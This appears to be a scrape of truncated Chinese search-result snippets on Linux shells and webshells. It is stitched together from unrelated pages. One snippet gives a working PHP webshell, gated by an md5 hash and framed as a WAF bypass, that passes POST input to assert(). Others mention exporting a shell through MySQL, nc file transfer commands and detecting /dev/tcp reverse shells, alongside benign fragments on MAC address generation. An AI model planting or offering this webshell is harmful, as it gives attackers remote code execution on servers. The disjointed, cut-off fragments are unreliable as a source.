的小企鹅，写着Linux shell 才知道shell是Linux独有的编程语言。 经常听大佬们讲什么 ...

1.mysql执行语句拿shell 2.利用md5绕过waf <?php if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?> ...

很老的东西了，但是很多时候会派上用场 mysql一句话导出shell Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp ...

1、进程 file descriptor 异常检测 检测 file descriptor 是否指向一个socket 以重定向+/dev/tcp Bash反弹Shell攻击方式为例，这类反弹shell的本质可以归纳为file descriptor的重定向到一个socket句柄。 2、检测 ...

1.1发送文件(公网发内网) 文件发送端： nc -lp 6666 < 文件 文件接收端： nc 发送端ip 发送端端口 > 新文件 1.2发送文件(内网发公网)文件发送端： nc -lp 6666 > 文件 文件接收端： nc ...

0x00 eval和assert的区别 http://www.vuln.cn/8395 http://www.php.net/manual/zh/function.eval.php http ...

问题 配置虚拟环境需要指定随机mac地址防止冲突 实现 先说结论 感兴趣的朋友可以继续看分析部分 思路 使用shell脚本生成6段00-ff的随机十六进制数 最后两两分割用 : 拼接为合法的mac地址 随机数 利用环境变量RANDOM,范围是0--32767 这里直接用echo ...

Linux 反弹shell（二）反弹shell的本质 from: https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章 Linux反弹shell（一）文件描述符与重定向，我们已经讨论过了反弹shell中最核心也是 ...